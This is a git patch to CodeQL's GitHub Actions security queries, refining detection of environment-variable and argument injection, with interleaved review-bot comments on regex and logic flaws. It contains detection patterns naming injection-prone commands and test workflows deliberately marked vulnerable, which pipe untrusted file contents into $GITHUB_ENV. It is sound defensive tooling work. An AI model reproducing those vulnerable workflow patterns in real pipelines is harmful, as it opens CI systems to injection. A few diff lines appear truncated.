| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | git | | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | From b49cd3b916e792221221c0215df29e448fa91019 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 08:48:32 +0200 Subject: [PATCH 587/707] Better handling of EnvVar Injection and Argument Injection --- ql/lib/codeql/actions/Bash.qll | 18 +++--- ql/lib/codeql/actions/config/Config.qll | 16 +---- .../codeql/actions/dataflow/FlowSources.qll | 4 +- .../actions/security/EnvVarInjectionQuery.qll | 57 ++++++++++++----- .../actions/security/PoisonableSteps.qll | 11 +--- .../security/UntrustedCheckoutQuery.qll | 8 +-- .../ext/config/argument_injection_sinks.yml | 15 +++-- ql/lib/ext/config/poisonable_steps.yml | 16 ++--- ql/lib/ext/config/untrusted_git_commands.yml | 26 ++++---- ql/test/library-tests/commands.expected | 36 +++++------ .../library-tests/poisonable_steps.expected | 1 - .../CWE-077/.github/workflows/test16.yml | 35 +++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 15 +++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 ++-- .../.github/workflows/arg_injection.yml | 62 +++++++++++++------ .../ArgumentInjectionCritical.expected | 54 +++++++++------- .../CWE-088/ArgumentInjectionMedium.expected | 33 +++++----- 17 files changed, 246 insertions(+), 172 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test16.yml 
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 12866a141a66..672f7727f5b5 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -220,9 +220,13 @@ class BashShellScript extends ShellScript { override string getCommand(int i) { // remove redirection result = - this.getCmd(i).regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") and + this.getCmd(i) + .regexpReplaceAll("(>|>>|2>|2>>|<|<<<)\\s*[\\{\\}\\$\"'_\\-0-9a-zA-Z]+$", "") + .trim() and // exclude variable declarations not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude comments + not result.trim().indexOf("#") = 0 and // exclude the following keywords not result = [ @@ -359,11 +363,11 @@ module Bash { exists(string regexp | // $(cmd) regexp = ".*\\$\\(([^)]+)\\).*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() or // `cmd` regexp = ".*`([^`]+)`.*" and - cmd = expr.regexpCapture(regexp, 1) + cmd = expr.regexpCapture(regexp, 1).trim() ) } @@ -657,8 +661,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and envReachingRunExpr(script, source, argument) ) } 
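Review bot: `not result.trim().indexOf("#") = 0` on the new comment-exclusion line re-trims a value that the chain two lines above already ends with `.trim()`, so the inner call is dead; `not result.indexOf("#") = 0` (or `not result.matches("#%")`) says the same. The comment should also note that only whole-line comments are dropped: a trailing `# ...` after a command stays in `result` and therefore in any `(.*?)` argument capture taken from it. The `getCommand` body continues past the hunk on both sides.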
@@ -669,8 +673,8 @@ module Bash { exists(string cmd, string regex, int command_group, int argument_group | cmd = script.getACommand() and argumentInjectionSinksDataModel(regex, command_group, argument_group) and - argument = cmd.regexpCapture(regex, argument_group) and - command = cmd.regexpCapture(regex, command_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and cmdReachingRunExpr(script, source, argument) ) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index e3bf239565eb..82b7a53a9d7b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -47,10 +47,6 @@ predicate externallyTriggerableEventsDataModel(string event) { private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } -private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } - -private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } - /** * MaD models for poisonable commands * Fields: @@ -59,9 +55,7 @@ private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and - // find regexp - regexp = - commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() + regexp = commandLauncher() + sub_regexp + ".*" ) } @@ -74,10 +68,7 @@ predicate poisonableCommandsDataModel(string regexp) { predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and - // capture regexp - regexp = - ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + - ".*" + regexp = commandLauncher() + sub_regexp + ".*" ) } 
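Review bot: Dropping `commandPrefixDelimiter()` changes the contract of `poisonableCommandsDataModel`, `poisonableLocalScriptsDataModel` (@@ -74) and `argumentInjectionSinksDataModel` (@@ -91 on the next line): the regexps are now anchored at the start of a single command as produced by `getACommand()`, and the `command_group`/`argument_group` indexes in the `ext/config/*.yml` data count groups of `sub_regexp` alone, because the deleted prefix delimiter `(^|;|\$\(|...)` was itself a capturing group (which is why the yml indexes shift by one in this commit). None of the three predicates' QLDoc says so. Add to each something like `// No delimiter prefix: getACommand() yields one command per string, so the pattern is anchored at its start and group numbers refer to sub_regexp only; alternatives added to commandLauncher() must stay non-capturing.` The "Fields:" QLDoc for these predicates starts outside the hunk.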
@@ -91,8 +82,7 @@ predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" + regexp = commandLauncher() + sub_regexp ) } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b30fd5495ed3..a9967a72ee6e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -100,10 +100,10 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { ) and this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getScript().getACommand() = cmd and + run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(cmd_regex) + cmd.regexpMatch(".*" + cmd_regex + ".*") ) } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 214e97fed6ba..13d6312b5856 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
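Review bot: `cmd.indexOf("git") = 0` now applies to `getAStmt()` instead of `getACommand()`, and if a statement is the whole line, the very shapes documented in `untrusted_git_commands.yml` (`FILES=$(git diff-tree ...)`, `COMMIT_MESSAGE=$(git log ...)`) start with an assignment and are rejected; whether `getAStmt()` also yields the substituted inner commands is not visible here. If the intent is to see the full statement, including the `$(...)` wrapper and any pipeline, replace the prefix test with a word-boundary match, `cmd.regexpMatch(".*\\bgit\\b.*")`, or drop it, since every `cmd_regex` already begins with `git\\b`. The `GitCommandSource` constructor starts outside the hunk.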
@@ -9,17 +9,17 @@ import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } +string sanitizerCommand() { + result = + [ + "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' + "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 + ] +} + /** * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * cat test-results/.env >> $GITHUB_ENV - * - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - * - * FOO=$(cat test-results/sha-number) - * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -31,11 +31,19 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( - exists(string cmd | - run.getScript().getACmdReachingGitHubEnvWrite(cmd, _) and - run.getScript().getAFileReadCommand() = cmd + // eg: + // echo "SHA=$(cat test-results/sha-number)" >> $GITHUB_ENV + // echo "SHA=$(> $GITHUB_ENV + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string cmd, string var, string sanitizer | + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) ) or + // eg: cat test-results/.env >> $GITHUB_ENV run.getScript().fileToGitHubEnv(_) ) ) 
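Review bot: In `sanitizerCommand()` the first alternative `tr\\s+(-d\\s*)?('|\")?.n('|\")?` uses `.n` where a literal backslash-n is meant, so any character followed by `n` satisfies it (`tr 'an' 'b'` counts as a newline sanitizer); the QL spelling for the two script characters `\n` is `\\\\n`. The third alternative `(head|tail)\\s+-n\\s+1` misses the common `head -n1` and `head -1` spellings; `(head|tail)\\s+(-n\\s*)?1\\b` covers them without matching `head -n 10`. The predicate is public and undocumented; mark it `private` and document that it is a regexp fragment consumed through `regexpFind`, so the absence of anchors is deliberate.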
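Review bot: The sanitizer check in `EnvVarInjectionFromFileReadSink` is vacuous: `exists(... string sanitizer | ... getACmdReachingGitHubEnvWrite(sanitizer, var) and not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)))` only asks for some command reaching the write of `var` that is not a sanitizer, and `cmd` itself (say `cat file`) always satisfies that, so `cat file | tr -d '\n' >> $GITHUB_ENV` is reported exactly as before. The same existential appears in `EnvVarInjectionFromCommandSink` (@@ -51) and `EnvVarInjectionFromEnvVarSink` (@@ -68) on the next line, where `source.getCommand()` or the env var's own path plays the same role. What is wanted is that no command reaching that write matches `sanitizerCommand()`, i.e. a negated existential; a shared private helper keeps the three sinks consistent, sketched below for the file-read sink (the other two replace their `( not ... or exists(...) )` disjunction with the same `not sanitizedEnvWrite(run.getScript(), var)`). Whether `getACmdReachingGitHubEnvWrite` reports the `tr` stage of a pipeline as its own command is not visible here and should be pinned by a test.
```ql
/**
 * Holds if some command whose output reaches the GITHUB_ENV write of `var`
 * in `script` matches `sanitizerCommand()`.
 */
private predicate sanitizedEnvWrite(ShellScript script, string var) {
  exists(string sanitizer |
    script.getACmdReachingGitHubEnvWrite(sanitizer, var) and
    exists(sanitizer.regexpFind(sanitizerCommand(), _, _))
  )
}

// … unchanged: EnvVarInjectionFromFileReadSink up to the first disjunct …
        exists(string cmd, string var |
          run.getScript().getAFileReadCommand() = cmd and
          run.getScript().getACmdReachingGitHubEnvWrite(cmd, var) and
          not sanitizedEnvWrite(run.getScript(), var)
        )
```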
@@ -51,9 +59,18 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { EnvVarInjectionFromCommandSink() { - exists(CommandSource source | + exists(CommandSource source, Run run, string var | this.asExpr() = source.getEnclosingRun().getScript() and - source.getEnclosingRun().getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), _) + run = source.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } @@ -68,10 +85,18 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name | + exists(Run run, string var_name, string var | exists(run.getInScopeEnvVarExpr(var_name)) and run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, _) + run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + ( + not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + or + exists(string sanitizer | + run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and + not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 85932181aed5..0cc8f9131667 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll 
@@ -3,22 +3,15 @@ import codeql.actions.config.Config abstract class PoisonableStep extends Step { } -private string dangerousActions() { - exists(string action | - poisonableActionsDataModel(action) and - result = action - ) -} - class DangerousActionUsesStep extends PoisonableStep, UsesStep { - DangerousActionUsesStep() { this.getCallee() = dangerousActions() } + DangerousActionUsesStep() { poisonableActionsDataModel(this.getCallee()) } } class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - this.getScript().getACommand().regexpMatch("^" + regexp + ".*") + this.getScript().getACommand().regexpMatch(regexp) ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index e9bf1edfe7da..c9a78f6d0b6b 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -53,7 +53,7 @@ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } @@ -99,7 +99,7 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { exists(Uses uses | uses.getCallee() = "actions/checkout" and - uses.getArgumentExpr("ref") = sink.asExpr() + uses.getArgumentExpr(["ref", "repository"]) = sink.asExpr() ) } 
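Review bot: Adding `"repository"` to `uses.getArgumentExpr(["ref", "repository"])` widens both checkout sinks without a word of explanation, and the same literal list is repeated in `isSink` at @@ -99 and in the two `getArgumentExpr` calls at @@ -199 and @@ -243 on the next line. A tainted `repository` input makes the checked-out tree come from whatever repository the input names, so even a full-SHA `ref` no longer pins trusted code, which is why it belongs in `ActionsSHACheckout` as well; say that in a comment and collect the list in one place, e.g. `private string checkoutSinkInput() { result = ["ref", "repository"] }`, so the four sites cannot diverge.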
@@ -199,7 +199,7 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt ( exists(ActionsMutableRefCheckoutFlow::PathNode sink | ActionsMutableRefCheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name @@ -243,7 +243,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ( exists(ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(_, sink) and - sink.getNode().asExpr() = this.getArgumentExpr("ref") + sink.getNode().asExpr() = this.getArgumentExpr(["ref", "repository"]) ) or // heuristic base on the step id and field name diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 95f813131685..56fced44da8b 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,11 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)\\s(.*?)", 2, 3] - - ["(curl)\\s(.*?)", 2, 3] - - ["(find)\\s(.*?)", 2, 3] - - ["(git)\\s(.*?)", 2, 3] - - ["(sed)\\s(.*?)", 2, 3] - - ["(tar)\\s(.*?)", 2, 3] - - ["(wget)\\s(.*?)", 2, 3] - - ["(zip)\\s(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index aa5148d7cf63..addadd75c879 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml 
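Review bot: The data change silently removes `curl` and narrows `git` to `git clone`, while the comment above still cites GTFOBins and the argument-injection cheat sheet as the basis for the list, so a reader cannot tell whether the drops are a false-positive trade-off or an oversight. Add a comment per removed or narrowed entry giving the reason (for example `# curl removed: too noisy, URL arguments are mostly literals`, if that is indeed the reason), and note next to the group indexes that they now count groups of this regexp only, because `Config.qll` stopped prepending a capturing delimiter in this commit.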
@@ -63,12 +63,12 @@ extensions:
 extensible: poisonableLocalScriptsDataModel
 data:
 # TODO: It could also be in the form of `dir/cmd`
- - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2]
- - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate
- - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3]
- - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3]
- - ["(python)\\s+(.*?)\\.py(.*?)", 3]
- - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3]
- - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4]
- - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3]
+ - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate
+ - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate
+ - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2]
+ - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2]
+ - ["(python)\\s+([^\\s]+)\\.py\\b", 2]
+ - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2]
+ - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3]
+ - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2]
diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml
index 0d6c9e3bfa0a..b4b96a4af43e 100644
--- a/ql/lib/ext/config/untrusted_git_commands.yml
+++ b/ql/lib/ext/config/untrusted_git_commands.yml
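Review bot: The new `(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b` row captures the first token after the interpreter, so for `bash -e build.sh` group 2 is `-e` rather than the script, and the `node`, `python`, `ruby` and `dotnet` rows appear to miss entirely when an option precedes the file because `[^\\s]+` cannot span the space. Skipping leading options with a non-capturing group keeps the group numbers intact, e.g. `- ["(source|sh|bash|zsh|fish)\\s+(?:-[^\\s]+\\s+)*([^\\s]+)\\b", 2]`, and the same prefix fits the other interpreter rows. The `# TODO` about `dir/cmd` is still open: the first row only matches paths starting with `./`. The predicate that consumes these rows is outside this chunk, so whether it uses a full or partial regex match is inferred.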
@@ -4,29 +4,29 @@ extensions:
 extensible: untrustedGitCommandsDataModel
 data:
 # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r)
- - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"]
+ - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"]
 # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore);
 # CHANGES=$(git diff --name-only)
- - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"]
+ - ["git\\b.*\\bdiff\\b", "filename,multiline"]
 # COMMIT_MESSAGE=$(git log --format=%s -n 1)
- - [".*git\\b.*\\blog\\b.*%s.*", "text,online"]
+ - ["git\\b.*\\blog\\b.*%s", "text,online"]
 # COMMIT_MESSAGE=$(git log --format=%B -n 1)
- - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"]
+ - ["git\\b.*\\blog\\b.*%B", "text,multiline"]
 # COMMIT_MESSAGE=$(git log --format=oneline)
- - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"]
+ - ["git\\b.*\\blog\\b.*oneline", "text,oneline"]
 # COMMIT_MESSAGE=$(git show -s --format=%B)
 # COMMIT_MESSAGE=$(git show -s --format=%s)
- - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"]
- - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"]
+ - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"]
+ - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"]
 # AUTHOR=$(git log -1 --pretty=format:'%an')
- - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"]
+ - ["git\\b.*\\blog\\b.*%an", "username,oneline"]
 # AUTHOR=$(git show -s --pretty=%an)
- - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"]
+ - ["git\\b.*\\bshow\\b.*%an", "username,oneline"]
 # EMAIL=$(git log -1 --pretty=format:'%ae')
- - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"]
+ - ["git\\b.*\\blog\\b.*%ae", "email,oneline"]
 # EMAIL=$(git show -s --pretty=%ae)
- - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"]
+ - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"]
 # BRANCH=$(git branch --show-current)
- - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"]
+ - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"]
 # BRANCH=$(git rev-parse --abbrev-ref HEAD)
- - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"]
+ - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"]
diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected
index d5536ca1c74d..12092de34ef9 100644
--- a/ql/test/library-tests/commands.expected
+++ b/ql/test/library-tests/commands.expected
@@ -92,24 +92,23 @@ | .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | 
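Review bot: The `%s` log row in `untrusted_git_commands.yml` still carries the typo `"text,online"` while every other row uses `oneline` (`"text,oneline"`, `"username,oneline"`, …); the commit rewrites that line anyway, so it should become `- ["git\\b.*\\blog\\b.*%s", "text,oneline"]`, otherwise a consumer switching on the second field treats that command as neither one-line nor multi-line. Separately, every pattern lost its leading and trailing `.*`: that is harmless if the consumer uses `regexpFind`, but with `regexpMatch`, which this commit adopts for `PoisonableCommandStep`, none of these would match the commented examples because trailing arguments such as `-n 1` are no longer covered. The predicate reading `untrustedGitCommandsDataModel` is outside this chunk, so please confirm which matching it uses.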
@@ -124,33 +123,30 @@ | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> 
$GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 220eaf336637..a79053f2240e 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | 